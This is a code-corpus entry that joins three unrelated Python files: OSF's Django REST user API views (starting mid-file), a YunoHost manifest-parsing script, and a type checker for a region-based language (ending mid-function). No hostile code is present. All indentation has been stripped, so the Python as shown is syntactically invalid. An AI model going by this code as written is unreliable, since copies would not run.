serializer_class = UserQuickFilesSerializer
view_category = 'users'
view_name = 'user-quickfiles'
def get_node(self, check_object_permissions):
return QuickFilesNode.objects.get_for_user(self.get_user(check_permissions=False))
def get_default_queryset(self):
self.kwargs[self.path_lookup_url_kwarg] = '/'
self.kwargs[self.provider_lookup_url_kwarg] = 'osfstorage'
files_list = self.fetch_from_waterbutler()
return files_list.children.prefetch_related('versions', 'tags').include('guids')
# overrides ListAPIView
def get_queryset(self):
return self.get_queryset_from_request()
class UserPreprints(JSONAPIBaseView, generics.ListAPIView, UserMixin, PreprintFilterMixin):
"""The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/users_preprints_list).
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
)
ordering = ('-created')
model_class = AbstractNode
required_read_scopes = [CoreScopes.USERS_READ, CoreScopes.NODE_PREPRINTS_READ]
required_write_scopes = [CoreScopes.USERS_WRITE, CoreScopes.NODE_PREPRINTS_WRITE]
serializer_class = PreprintSerializer
view_category = 'users'
view_name = 'user-preprints'
def get_default_queryset(self):
# the user who is requesting
auth = get_user_auth(self.request)
auth_user = getattr(auth, 'user', None)
# the user data being requested
target_user = self.get_user(check_permissions=False)
# Permissions on the list objects are handled by the query
default_qs = Preprint.objects.filter(_contributors__guids___id=target_user._id).exclude(machine_state='initial')
return self.preprints_queryset(default_qs, auth_user, allow_contribs=False)
def get_queryset(self):
return self.get_queryset_from_request()
class UserInstitutions(JSONAPIBaseView, generics.ListAPIView, UserMixin):
"""The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/users_institutions_list).
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
)
required_read_scopes = [CoreScopes.USERS_READ, CoreScopes.INSTITUTION_READ]
required_write_scopes = [CoreScopes.NULL]
serializer_class = InstitutionSerializer
view_category = 'users'
view_name = 'user-institutions'
ordering = ('-pk', )
def get_default_odm_query(self):
return None
def get_queryset(self):
user = self.get_user()
return user.affiliated_institutions.all()
class UserRegistrations(JSONAPIBaseView, generics.ListAPIView, UserMixin, NodesFilterMixin):
"""The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/users_registrations_list).
"""
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
)
model_class = Registration
required_read_scopes = [CoreScopes.USERS_READ, CoreScopes.NODE_REGISTRATIONS_READ]
required_write_scopes = [CoreScopes.USERS_WRITE, CoreScopes.NODE_REGISTRATIONS_WRITE]
serializer_class = RegistrationSerializer
view_category = 'users'
view_name = 'user-registrations'
ordering = ('-modified',)
# overrides NodesFilterMixin
def get_default_queryset(self):
user = self.get_user()
current_user = self.request.user
qs = default_node_list_permission_queryset(user=current_user, model_cls=Registration)
# OSF group members not copied to registration. Only registration contributors need to be checked here.
return qs.filter(contributor__user__id=user.id)
# overrides ListAPIView
def get_queryset(self):
return self.get_queryset_from_request().select_related('node_license').include('contributor__user__guids', 'root__guids', limit_includes=10)
class UserDraftRegistrations(JSONAPIBaseView, generics.ListAPIView, UserMixin):
permission_classes = (
drf_permissions.IsAuthenticated,
base_permissions.TokenHasScope,
CurrentUser,
)
required_read_scopes = [CoreScopes.USERS_READ, CoreScopes.NODE_DRAFT_REGISTRATIONS_READ]
required_write_scopes = [CoreScopes.USERS_WRITE, CoreScopes.NODE_DRAFT_REGISTRATIONS_WRITE]
serializer_class = DraftRegistrationSerializer
view_category = 'users'
view_name = 'user-draft-registrations'
ordering = ('-modified',)
def get_queryset(self):
user = self.get_user()
node_qs = Node.objects.get_nodes_for_user(user, permissions.ADMIN_NODE)
return DraftRegistration.objects.filter(
Q(registered_node__isnull=True) |
Q(registered_node__is_deleted=True),
branched_from__in=list(node_qs),
deleted__isnull=True,
)
class UserInstitutionsRelationship(JSONAPIBaseView, generics.RetrieveDestroyAPIView, UserMixin):
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
ReadOnlyOrCurrentUserRelationship,
)
required_read_scopes = [CoreScopes.USERS_READ]
required_write_scopes = [CoreScopes.USERS_WRITE]
serializer_class = UserInstitutionsRelationshipSerializer
parser_classes = (JSONAPIRelationshipParser, JSONAPIRelationshipParserForRegularJSON, )
view_category = 'users'
view_name = 'user-institutions-relationship'
def get_object(self):
user = self.get_user(check_permissions=False)
obj = {
'data': user.affiliated_institutions.all(),
'self': user,
}
self.check_object_permissions(self.request, obj)
return obj
def perform_destroy(self, instance):
data = self.request.data['data']
user = self.request.user
current_institutions = set(user.affiliated_institutions.values_list('_id', flat=True))
# DELETEs normally dont get type checked
# not the best way to do it, should be enforced everywhere, maybe write a test for it
for val in data:
if val['type'] != get_meta_type(self.serializer_class, self.request):
raise Conflict()
for val in data:
if val['id'] in current_institutions:
user.remove_institution(val['id'])
user.save()
class UserIdentitiesList(JSONAPIBaseView, generics.ListAPIView, UserMixin):
"""
The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/external_identities_list).
"""
permission_classes = (
base_permissions.TokenHasScope,
drf_permissions.IsAuthenticatedOrReadOnly,
CurrentUser,
)
serializer_class = UserIdentitiesSerializer
required_read_scopes = [CoreScopes.USER_SETTINGS_READ]
required_write_scopes = [CoreScopes.NULL]
view_category = 'users'
view_name = 'user-identities-list'
# overrides ListAPIView
def get_queryset(self):
user = self.get_user()
identities = []
for key, value in user.external_identity.items():
identities.append({'_id': key, 'external_id': list(value.keys())[0], 'status': list(value.values())[0]})
return identities
class UserIdentitiesDetail(JSONAPIBaseView, generics.RetrieveDestroyAPIView, UserMixin):
"""
The documentation for this endpoint can be found [here](https://developer.osf.io/#operation/external_identities_detail).
"""
permission_classes = (
base_permissions.TokenHasScope,
drf_permissions.IsAuthenticatedOrReadOnly,
CurrentUser,
)
required_read_scopes = [CoreScopes.USER_SETTINGS_READ]
required_write_scopes = [CoreScopes.USER_SETTINGS_WRITE]
serializer_class = UserIdentitiesSerializer
view_category = 'users'
view_name = 'user-identities-detail'
def get_object(self):
user = self.get_user()
identity_id = self.kwargs['identity_id']
try:
identity = user.external_identity[identity_id]
except KeyError:
raise NotFound('Requested external identity could not be found.')
return {'_id': identity_id, 'external_id': identity.keys()[0], 'status': identity.values()[0]}
def perform_destroy(self, instance):
user = self.get_user()
identity_id = self.kwargs['identity_id']
try:
user.external_identity.pop(identity_id)
except KeyError:
raise NotFound('Requested external identity could not be found.')
user.save()
class UserAccountExport(JSONAPIBaseView, generics.CreateAPIView, UserMixin):
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
CurrentUser,
)
required_read_scopes = [CoreScopes.NULL]
required_write_scopes = [CoreScopes.USER_SETTINGS_WRITE]
view_category = 'users'
view_name = 'user-account-export'
serializer_class = UserAccountExportSerializer
throttle_classes = (SendEmailThrottle, )
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
user = self.get_user()
mails.send_mail(
to_addr=settings.OSF_SUPPORT_EMAIL,
mail=mails.REQUEST_EXPORT,
user=user,
can_change_preferences=False,
)
user.email_last_sent = timezone.now()
user.save()
return Response(status=status.HTTP_204_NO_CONTENT)
class UserChangePassword(JSONAPIBaseView, generics.CreateAPIView, UserMixin):
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
CurrentUser,
)
required_read_scopes = [CoreScopes.NULL]
required_write_scopes = [CoreScopes.USER_SETTINGS_WRITE]
view_category = 'users'
view_name = 'user_password'
serializer_class = UserChangePasswordSerializer
def create(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
user = self.get_user()
existing_password = request.data['existing_password']
new_password = request.data['new_password']
# It has been more than 1 hour since last invalid attempt to change password. Reset the counter for invalid attempts.
if throttle_period_expired(user.change_password_last_attempt, settings.TIME_RESET_CHANGE_PASSWORD_ATTEMPTS):
user.reset_old_password_invalid_attempts()
# There have been more than 3 failed attempts and throttle hasn't expired.
if user.old_password_invalid_attempts >= settings.INCORRECT_PASSWORD_ATTEMPTS_ALLOWED and not throttle_period_expired(
user.change_password_last_attempt, settings.CHANGE_PASSWORD_THROTTLE,
):
time_since_throttle = (timezone.now() - user.change_password_last_attempt.replace(tzinfo=pytz.utc)).total_seconds()
wait_time = settings.CHANGE_PASSWORD_THROTTLE - time_since_throttle
raise Throttled(wait=wait_time)
try:
# double new password for confirmation because validation is done on the front-end.
user.change_password(existing_password, new_password, new_password)
except ChangePasswordError as error:
# A response object must be returned instead of raising an exception to avoid rolling back the transaction
# and losing the incrementation of failed password attempts
user.save()
return JsonResponse(
{'errors': [{'detail': message} for message in error.messages]},
status=400,
content_type='application/vnd.api+json; application/json',
)
user.save()
remove_sessions_for_user(user)
return Response(status=status.HTTP_204_NO_CONTENT)
class UserSettings(JSONAPIBaseView, generics.RetrieveUpdateAPIView, UserMixin):
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
CurrentUser,
)
required_read_scopes = [CoreScopes.USER_SETTINGS_READ]
required_write_scopes = [CoreScopes.USER_SETTINGS_WRITE]
throttle_classes = (SendEmailDeactivationThrottle, )
view_category = 'users'
view_name = 'user_settings'
serializer_class = UserSettingsSerializer
# overrides RetrieveUpdateAPIView
def get_serializer_class(self):
if self.request.method in ('PUT', 'PATCH'):
return UserSettingsUpdateSerializer
return UserSettingsSerializer
# overrides RetrieveUpdateAPIView
def get_object(self):
return self.get_user()
class ClaimUser(JSONAPIBaseView, generics.CreateAPIView, UserMixin):
permission_classes = (
base_permissions.TokenHasScope,
ClaimUserPermission,
)
required_read_scopes = [CoreScopes.NULL] # Tokens should not be able to access this
required_write_scopes = [CoreScopes.NULL] # Tokens should not be able to access this
view_category = 'users'
view_name = 'claim-user'
def _send_claim_email(self, *args, **kwargs):
""" This avoids needing to reimplement all of the logic in the sender methods.
When v1 is more fully deprecated, those send hooks should be reworked to not
rely upon a flask context and placed in utils (or elsewhere).
:param bool registered: Indicates which sender to call (passed in as keyword)
:param *args: Positional arguments passed to senders
:param **kwargs: Keyword arguments passed to senders
:return: None
"""
from website.app import app
from website.routes import make_url_map
try:
make_url_map(app)
except AssertionError:
# Already mapped
pass
ctx = app.test_request_context()
ctx.push()
if kwargs.pop('registered', False):
send_claim_registered_email(*args, **kwargs)
else:
send_claim_email(*args, **kwargs)
ctx.pop()
def post(self, request, *args, **kwargs):
claimer = request.user
email = (request.data.get('email', None) or '').lower().strip()
record_id = (request.data.get('id', None) or '').lower().strip()
if not record_id:
raise ValidationError('Must specify record "id".')
claimed_user = self.get_user(check_permissions=True) # Ensures claimability
if claimed_user.is_disabled:
raise ValidationError('Cannot claim disabled account.')
try:
record_referent = Guid.objects.get(_id=record_id).referent
except Guid.DoesNotExist:
raise NotFound('Unable to find specified record.')
try:
unclaimed_record = claimed_user.unclaimed_records[record_referent._id]
except KeyError:
if isinstance(record_referent, Preprint) and record_referent.node and record_referent.node._id in claimed_user.unclaimed_records:
record_referent = record_referent.node
unclaimed_record = claimed_user.unclaimed_records[record_referent._id]
else:
raise NotFound('Unable to find specified record.')
if claimer.is_anonymous and email:
claimer = get_user(email=email)
try:
if claimer and claimer.is_registered:
self._send_claim_email(claimer, claimed_user, record_referent, registered=True)
else:
self._send_claim_email(email, claimed_user, record_referent, notify=True, registered=False)
except HTTPError as e:
raise ValidationError(e.data['message_long'])
elif isinstance(claimer, OSFUser):
if unclaimed_record.get('referrer_id', '') == claimer._id:
raise ValidationError('Referrer cannot claim user.')
try:
self._send_claim_email(claimer, claimed_user, record_referent, registered=True)
except HTTPError as e:
raise ValidationError(e.data['message_long'])
else:
raise ValidationError('Must either be logged in or specify claim email.')
return Response(status=status.HTTP_204_NO_CONTENT)
class UserEmailsList(JSONAPIBaseView, generics.ListAPIView, generics.CreateAPIView, UserMixin, ListFilterMixin):
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
CurrentUser,
)
required_read_scopes = [CoreScopes.USER_SETTINGS_READ]
required_write_scopes = [CoreScopes.USER_SETTINGS_WRITE]
throttle_classes = (SendEmailThrottle, )
view_category = 'users'
view_name = 'user-emails'
serializer_class = UserEmailsSerializer
def get_default_queryset(self):
user = self.get_user()
serialized_emails = []
for email in user.emails.all():
primary = email.address == user.username
hashed_id = hashids.encode(email.id)
serialized_email = UserEmail(email_id=hashed_id, address=email.address, confirmed=True, verified=True, primary=primary)
serialized_emails.append(serialized_email)
email_verifications = user.email_verifications or {}
for token, detail in email_verifications.iteritems():
is_merge = Email.objects.filter(address=detail['email']).exists()
serialized_unconfirmed_email = UserEmail(
email_id=token,
address=detail['email'],
confirmed=detail['confirmed'],
verified=False,
primary=False,
is_merge=is_merge,
)
serialized_emails.append(serialized_unconfirmed_email)
return serialized_emails
# overrides ListAPIView
def get_queryset(self):
return self.get_queryset_from_request()
class UserEmailsDetail(JSONAPIBaseView, generics.RetrieveUpdateDestroyAPIView, UserMixin):
permission_classes = (
drf_permissions.IsAuthenticatedOrReadOnly,
base_permissions.TokenHasScope,
CurrentUser,
)
required_read_scopes = [CoreScopes.USER_SETTINGS_READ]
required_write_scopes = [CoreScopes.USER_SETTINGS_WRITE]
view_category = 'users'
view_name = 'user-email-detail'
serializer_class = UserEmailsSerializer
# Overrides RetrieveUpdateDestroyAPIView
def get_object(self):
email_id = self.kwargs['email_id']
user = self.get_user()
email = None
# check to see if it's a confirmed email with hashed id
decoded_id = hashids.decode(email_id)
if decoded_id:
try:
email = user.emails.get(id=decoded_id[0])
except Email.DoesNotExist:
email = None
else:
primary = email.address == user.username
address = email.address
confirmed = True
verified = True
is_merge = False
# check to see if it's an unconfirmed email with a token
elif user.unconfirmed_emails:
try:
email = user.email_verifications[email_id]
address = email['email']
confirmed = email['confirmed']
verified = False
primary = False
is_merge = Email.objects.filter(address=address).exists()
except KeyError:
email = None
if not email:
raise NotFound
# check for resend confirmation email query parameter in a GET request
if self.request.method == 'GET' and is_truthy(self.request.query_params.get('resend_confirmation')):
if not confirmed and settings.CONFIRM_REGISTRATIONS_BY_EMAIL:
if throttle_period_expired(user.email_last_sent, settings.SEND_EMAIL_THROTTLE):
send_confirm_email(user, email=address, renew=True)
user.email_last_sent = timezone.now()
user.save()
return UserEmail(email_id=email_id, address=address, confirmed=confirmed, verified=verified, primary=primary, is_merge=is_merge)
def get(self, request, *args, **kwargs):
response = super(UserEmailsDetail, self).get(request, *args, **kwargs)
if is_truthy(self.request.query_params.get('resend_confirmation')):
user = self.get_user()
email_id = kwargs.get('email_id')
if user.unconfirmed_emails and user.email_verifications.get(email_id):
response.status = response.status_code = status.HTTP_202_ACCEPTED
return response
# Overrides RetrieveUpdateDestroyAPIView
def perform_destroy(self, instance):
user = self.get_user()
email = instance.address
if instance.confirmed and instance.verified:
try:
user.remove_email(email)
except PermissionsError as e:
raise ValidationError(e.args[0])
else:
user.remove_unconfirmed_email(email)
user.save()
|
mattclark/osf.io
|
api/users/views.py
|
Python
|
apache-2.0
| 35,356
|
#!/usr/bin/python3
import sys
import json
def argument_for_question(question, all_choices=False):
question_type = question.get("type")
if question_type is None and question.get("choices"):
question_type = "boolean"
elif question_type in [None, "string"] and question.get("default"):
question_type = "with_default"
elif question_type is None and question["name"] == "admin":
question_type = "user"
elif question_type is None and question["name"] == "domain":
question_type = "domain"
if question_type == "domain":
return (question["name"], "ynh.local")
elif question_type == "path":
if all_choices:
return (question["name"], question["default"], "/")
else:
return (question["name"], question["default"])
elif question_type == "with_default":
return (question["name"], question["default"])
elif question_type == "boolean":
if not all_choices:
if isinstance(question["default"], bool):
if question["default"]:
question["default"] = "1"
else:
question["default"] = "0"
return (question["name"], question["default"])
else:
if isinstance(question["default"], bool) :
return (question["name"], "1", "0")
if question.get("choices"):
return (question["name"],) + tuple(question["choices"])
return (question["name"], question["default"])
elif question_type == "password":
return (question["name"], "ynh")
elif question_type == "user":
return (question["name"], "johndoe")
else:
raise Exception("Unknow question type: %s\n" % question_type, question)
if __name__ == '__main__':
manifest_path = sys.argv[1:][0]
manifest = json.load(open(manifest_path, "r"))
for question in manifest["arguments"]["install"]:
print(":".join(argument_for_question(question, all_choices=True)))
|
YunoHost/package_check
|
lib/manifest_parsing.py
|
Python
|
gpl-3.0
| 2,032
|
#!/usr/bin/env python
# Copyright 2014 Stanford University and Los Alamos National Security, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###
### Type Checker
###
# Backport of singledispatch to Python 2.x.
try:
from functools import singledispatch
except ImportError:
from singledispatch import singledispatch
# Work around for OrderedDict missing in Python 2.6.
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
from . import ast, types
from .clang import types as ctypes
def is_eq(t): return types.is_POD(t) or types.is_pointer(t)
def returns_same_type(*ts): return ts[0]
def returns_bool(*_ignored): return types.Bool()
unary_operator_table = {
'-': (types.is_numeric, returns_same_type),
'!': (types.is_bool, returns_bool),
'~': (types.is_integral, returns_same_type),
}
binary_operator_table = {
'*': (types.is_numeric, returns_same_type),
'/': (types.is_numeric, returns_same_type),
'%': (types.is_integral, returns_same_type),
'+': (types.is_numeric, returns_same_type),
'-': (types.is_numeric, returns_same_type),
'>>': (types.is_integral, returns_same_type),
'<<': (types.is_integral, returns_same_type),
'<': (types.is_numeric, returns_bool),
'<=': (types.is_numeric, returns_bool),
'>': (types.is_numeric, returns_bool),
'>=': (types.is_numeric, returns_bool),
'==': (is_eq, returns_bool),
'!=': (is_eq, returns_bool),
'&': (types.is_integral, returns_same_type),
'^': (types.is_integral, returns_same_type),
'|': (types.is_integral, returns_same_type),
'&&': (types.is_bool, returns_bool),
'||': (types.is_bool, returns_bool),
}
reduce_operator_table = {
'*': types.is_numeric,
'/': types.is_numeric,
'%': types.is_integral,
'+': types.is_numeric,
'-': types.is_numeric,
'>>': types.is_integral,
'<<': types.is_integral,
'&': types.is_integral,
'^': types.is_integral,
'|': types.is_integral,
}
# A method combination around wrapper a la Common Lisp.
class DispatchAround:
def __init__(self, inner_fn, outer_fn):
self.inner_fn = inner_fn
self.outer_fn = outer_fn
def __call__(self, *args, **kwargs):
return self.outer_fn(self.inner_fn, *args, **kwargs)
def __getattr__(self, name):
return getattr(self.inner_fn, name)
def store_result_in_type_map(fn):
def helper(fn, node, cx):
node_type = fn(node, cx)
cx.type_map[node] = node_type
return node_type
return DispatchAround(fn, helper)
@store_result_in_type_map
@singledispatch
def type_check_node(node, cx):
raise Exception('Type checking failed at %s' % node)
@type_check_node.register(ast.Program)
def _(node, cx):
cx = cx.new_global_scope()
def_types = type_check_node(node.definitions, cx)
return types.Program(def_types)
@type_check_node.register(ast.Definitions)
def _(node, cx):
def_types = []
for definition in node.definitions:
def_types.append(type_check_node(definition, cx))
return def_types
@type_check_node.register(ast.Import)
def _(node, cx):
module_type = ctypes.foreign_type(node.ast, cx.opts)
for foreign_name, foreign_type in module_type.def_types.iteritems():
cx.insert(node, foreign_name, foreign_type)
cx.foreign_types.append(foreign_type)
return module_type
@type_check_node.register(ast.Struct)
def _(node, cx):
original_cx = cx
cx = cx.new_struct_scope()
# Initially create empty struct type.
struct_name = type_check_node(node.name, cx)
param_types = [
cx.region_forest.add(
types.Region(param.name, types.RegionKind(None, None)))
for param in node.params.params]
region_types = [
cx.region_forest.add(
types.Region(region.name, types.RegionKind(None, None)))
for region in node.regions.regions]
struct_constraints = []
empty_field_map = OrderedDict()
struct_type = types.Struct(struct_name, param_types, region_types, struct_constraints, empty_field_map)
def_struct_type = types.Kind(type = struct_type)
# Insert the struct name into global scope.
original_cx.insert(node, struct_name, def_struct_type)
# Figure out the actual types for params and regions and
# insert them into struct scope.
for param, param_type in zip(node.params.params, param_types):
cx.insert(node, param.name, param_type)
param_type.kind = type_check_node(param.type, cx)
if not param_type.validate_regions():
raise types.TypeError(node, 'Region type is inconsistent with itself: %s' % param_type.pretty_kind())
for region, region_type in zip(node.regions.regions, region_types):
cx.insert(node, region.name, region_type)
region_type.kind = type_check_node(region.type, cx)
if not region_type.validate_regions():
raise types.TypeError(node, 'Region type is inconsistent with itself: %s' % region_type.pretty_kind())
struct_constraints = type_check_node(node.constraints, cx)
struct_type.constraints = struct_constraints
field_map = type_check_node(node.field_decls, cx)
struct_type.field_map = field_map
# Note: This simple check only works as long as mutual
# recursion is disallowed on structs.
for field_type in field_map.itervalues():
if field_type == struct_type:
raise types.TypeError(node, 'Struct may not contain itself')
return def_struct_type
@type_check_node.register(ast.StructName)
def _(node, cx):
return node.name
@type_check_node.register(ast.StructConstraints)
def _(node, cx):
return [type_check_node(constraint, cx) for constraint in node.constraints]
@type_check_node.register(ast.StructConstraint)
def _(node, cx):
lhs = type_check_node(node.lhs, cx)
rhs = type_check_node(node.rhs, cx)
if lhs.kind.contains_type != rhs.kind.contains_type:
raise types.TypeError(node, 'Type mismatch in region element types for constraint: %s and %s' % (
lhs.kind.contains_type, rhs.kind.contains_type))
constraint = types.Constraint(node.op, lhs, rhs)
return constraint
@type_check_node.register(ast.StructConstraintRegion)
def _(node, cx):
region_type = cx.lookup(node, node.name)
assert types.is_region(region_type)
return region_type
@type_check_node.register(ast.FieldDecls)
def _(node, cx):
return OrderedDict([
type_check_node(field_decl, cx)
for field_decl in node.field_decls])
@type_check_node.register(ast.FieldDecl)
def _(node, cx):
field_kind = type_check_node(node.field_type, cx)
return (node.name, field_kind.type)
@type_check_node.register(ast.Function)
def _(node, cx):
original_cx = cx
cx = cx.new_function_scope()
fn_name = type_check_node(node.name, cx)
param_types = type_check_node(node.params, cx)
cx.privileges = type_check_node(node.privileges, cx)
return_kind = type_check_node(node.return_type, cx)
assert types.is_kind(return_kind)
return_type = return_kind.type
fn_type = types.Function(param_types, cx.privileges, return_type)
# Insert function name into global scope. Second insert
# prevents parameters from shadowing function name.
original_cx.insert(node, fn_name, fn_type)
cx.insert(node, fn_name, fn_type)
type_check_node(node.block, cx.with_return_type(return_type))
return fn_type
@type_check_node.register(ast.FunctionName)
def _(node, cx):
return node.name
@type_check_node.register(ast.FunctionParams)
def _(node, cx):
return [type_check_node(param, cx)
for param in node.params]
@type_check_node.register(ast.FunctionParam)
def _(node, cx):
if isinstance(node.declared_type, ast.TypeRegionKind):
# Region types may be self-referential. Insert regions
# into scope early to handle recursive types.
region_type = types.Region(node.name, types.RegionKind(None, None))
cx.region_forest.add(region_type)
cx.insert(node, node.name, region_type)
region_kind = type_check_node(node.declared_type, cx)
region_type.kind = region_kind
if not region_type.validate_regions():
raise types.TypeError(node, 'Region type is inconsistent with itself: %s' % region_type.pretty_kind())
return region_type
if isinstance(node.declared_type, ast.TypeArrayKind):
# Region types may be self-referential. Insert regions
# into scope early to handle recursive types.
region_type = types.Region(node.name, types.RegionKind(None, None))
cx.region_forest.add(region_type)
cx.insert(node, node.name, region_type)
region_kind = type_check_node(node.declared_type, cx)
region_type.kind = region_kind
return region_type
if isinstance(node.declared_type, ast.TypeIspaceKind):
ispace_kind = type_check_node(node.declared_type, cx)
ispace_type = types.Ispace(node.name, ispace_kind)
cx.insert(node, node.name, ispace_type)
return ispace_type
# Handle non-region types:
declared_kind = type_check_node(node.declared_type, cx)
assert types.is_kind(declared_kind)
declared_type = declared_kind.type
if types.is_void(declared_type):
raise types.TypeError(node, 'Task parameters are not allowed to be void')
if not types.is_concrete(declared_type):
raise types.TypeError(node, 'Task parameters are not allowed to contain wildcards')
assert types.allows_var_binding(declared_type)
reference_type = types.StackReference(declared_type)
cx.insert(node, node.name, reference_type)
return declared_type
@type_check_node.register(ast.FunctionReturnType)
def _(node, cx):
return type_check_node(node.declared_type, cx)
@type_check_node.register(ast.FunctionPrivileges)
def _(node, cx):
return cx.privileges | set(
privilege
for privilege_node in node.privileges
for privilege in type_check_node(privilege_node, cx))
@type_check_node.register(ast.FunctionPrivilege)
def _(node, cx):
return type_check_node(node.privilege, cx)
@type_check_node.register(ast.TypeVoid)
def _(node, cx):
return types.Kind(types.Void())
@type_check_node.register(ast.TypeBool)
def _(node, cx):
return types.Kind(types.Bool())
@type_check_node.register(ast.TypeDouble)
def _(node, cx):
return types.Kind(types.Double())
@type_check_node.register(ast.TypeFloat)
def _(node, cx):
return types.Kind(types.Float())
@type_check_node.register(ast.TypeInt)
def _(node, cx):
return types.Kind(types.Int())
@type_check_node.register(ast.TypeUInt)
def _(node, cx):
return types.Kind(types.UInt())
@type_check_node.register(ast.TypeInt8)
def _(node, cx):
return types.Kind(types.Int8())
@type_check_node.register(ast.TypeInt16)
def _(node, cx):
return types.Kind(types.Int16())
@type_check_node.register(ast.TypeInt32)
def _(node, cx):
return types.Kind(types.Int32())
@type_check_node.register(ast.TypeInt64)
def _(node, cx):
return types.Kind(types.Int64())
@type_check_node.register(ast.TypeUInt8)
def _(node, cx):
return types.Kind(types.UInt8())
@type_check_node.register(ast.TypeUInt16)
def _(node, cx):
return types.Kind(types.UInt16())
@type_check_node.register(ast.TypeUInt32)
def _(node, cx):
return types.Kind(types.UInt32())
@type_check_node.register(ast.TypeUInt64)
def _(node, cx):
return types.Kind(types.UInt64())
@type_check_node.register(ast.TypeColoring)
def _(node, cx):
region = type_check_node(node.region, cx)
if not (types.is_region(region) or types.is_ispace(region)):
raise types.TypeError(node, 'Type mismatch in type %s: expected %s but got %s' % (
'coloring', 'a region or ispace', region))
return types.Kind(types.Coloring(region))
@type_check_node.register(ast.TypeColoringRegion)
def _(node, cx):
return cx.lookup(node, node.name)
@type_check_node.register(ast.TypeID)
def _(node, cx):
kind = cx.lookup(node, node.name)
args = type_check_node(node.args, cx)
if not types.is_kind(kind):
raise types.TypeError(node, 'Type mismatch in type %s: expected a type but got %s' % (
node.name, kind))
if len(args) != len(kind.type.params):
raise types.TypeError(node, 'Incorrect number of arguments for struct %s: expected %s but got %s' % (
node.name, len(kind.type.params), len(args)))
region_map = dict([
(old_region, new_region)
for old_region, new_region in zip(kind.type.params, args)])
for param, arg in zip(kind.type.params, args):
assert types.is_region(param)
if types.is_region(arg):
if param.kind.contains_type is not None and arg.kind.contains_type is not None:
param_kind = param.kind.substitute_regions(region_map)
arg_kind = arg.kind
if param_kind != arg_kind:
raise types.TypeError(node, 'Type mismatch in type parameter to %s: expected %s but got %s' % (
node.name, param_kind, arg_kind))
elif types.is_region_wild(arg):
pass
else:
assert False
return kind.instantiate_params(region_map)
@type_check_node.register(ast.TypeArgs)
def _(node, cx):
return [type_check_node(arg, cx) for arg in node.args]
@type_check_node.register(ast.TypeArg)
def _(node, cx):
arg = cx.lookup(node, node.name)
if not types.is_region(arg):
raise types.TypeError(node, 'Type mismatch in type %s: expected a region but got %s' % (
node.name, arg))
return arg
@type_check_node.register(ast.TypeArgWild)
def _(node, cx):
return types.RegionWild()
@type_check_node.register(ast.TypePointer)
def _(node, cx):
points_to_kind = type_check_node(node.points_to_type, cx)
regions = type_check_node(node.regions, cx)
assert types.is_kind(points_to_kind)
points_to_type = points_to_kind.type
for region in regions:
if types.is_region(region):
contains_type = region.kind.contains_type
if contains_type is not None and contains_type != points_to_type:
raise types.TypeError(node, 'Type mismatch in pointer type: expected %s but got %s' % (
contains_type, points_to_type))
elif types.is_region_wild(region):
pass
else:
if not types.is_kind(region):
raise types.TypeError(node, 'Type mismatch in pointer type: expected a region but got %s' % (
region))
raise types.TypeError(node, 'Type mismatch in pointer type: expected a region but got %s' % (
region.type))
return types.Kind(types.Pointer(points_to_type, regions))
@type_check_node.register(ast.TypePointerRegions)
def _(node, cx):
return [type_check_node(region, cx)
for region in node.regions]
@type_check_node.register(ast.TypeRegion)
def _(node, cx):
region_type = cx.lookup(node, node.name)
return region_type
@type_check_node.register(ast.TypeRegionWild)
def _(node, cx):
return types.RegionWild()
@type_check_node.register(ast.TypeRegionKind)
def _(node, cx):
contains_type = None
if node.contains_type is not None:
contains_type = type_check_node(node.contains_type, cx).type
return types.RegionKind(None, contains_type)
@type_check_node.register(ast.TypeArrayKind)
def _(node, cx):
ispace = type_check_node(node.ispace, cx)
contains_type = type_check_node(node.contains_type, cx).type
return types.RegionKind(ispace, contains_type)
@type_check_node.register(ast.TypeIspace)
def _(node, cx):
ispace_type = cx.lookup(node, node.name)
return ispace_type
@type_check_node.register(ast.TypeIspaceKind)
def _(node, cx):
index_type = type_check_node(node.index_type, cx).type
return types.IspaceKind(index_type)
@type_check_node.register(ast.Privilege)
def _(node, cx):
if node.privilege == 'reads':
privilege = types.Privilege.READ
elif node.privilege == 'writes':
privilege = types.Privilege.WRITE
elif node.privilege == 'reduces':
privilege = types.Privilege.REDUCE
else:
assert False
regions = type_check_node(node.regions, cx)
return [
types.Privilege(node, privilege, node.op, region, field_path)
for region, field_path in regions]
@type_check_node.register(ast.PrivilegeRegions)
def _(node, cx):
return [
region
for region_node in node.regions
for region in type_check_node(region_node, cx)]
@type_check_node.register(ast.PrivilegeRegion)
def _(node, cx):
region = cx.lookup(node, node.name)
field_paths = type_check_node(node.fields, cx)
return [(region, field_path) for field_path in field_paths]
@type_check_node.register(ast.PrivilegeRegionFields)
def _(node, cx):
if len(node.fields) == 0:
return [()]
return [
field_path
for field_node in node.fields
for field_path in type_check_node(field_node, cx)]
@type_check_node.register(ast.PrivilegeRegionField)
def _(node, cx):
prefix = (node.name,)
field_paths = type_check_node(node.fields, cx)
return [prefix + field_path for field_path in field_paths]
@type_check_node.register(ast.Block)
def _(node, cx):
